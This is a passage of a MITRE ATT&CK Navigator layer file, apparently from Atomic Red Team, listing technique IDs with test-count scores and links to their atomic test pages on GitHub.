Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View 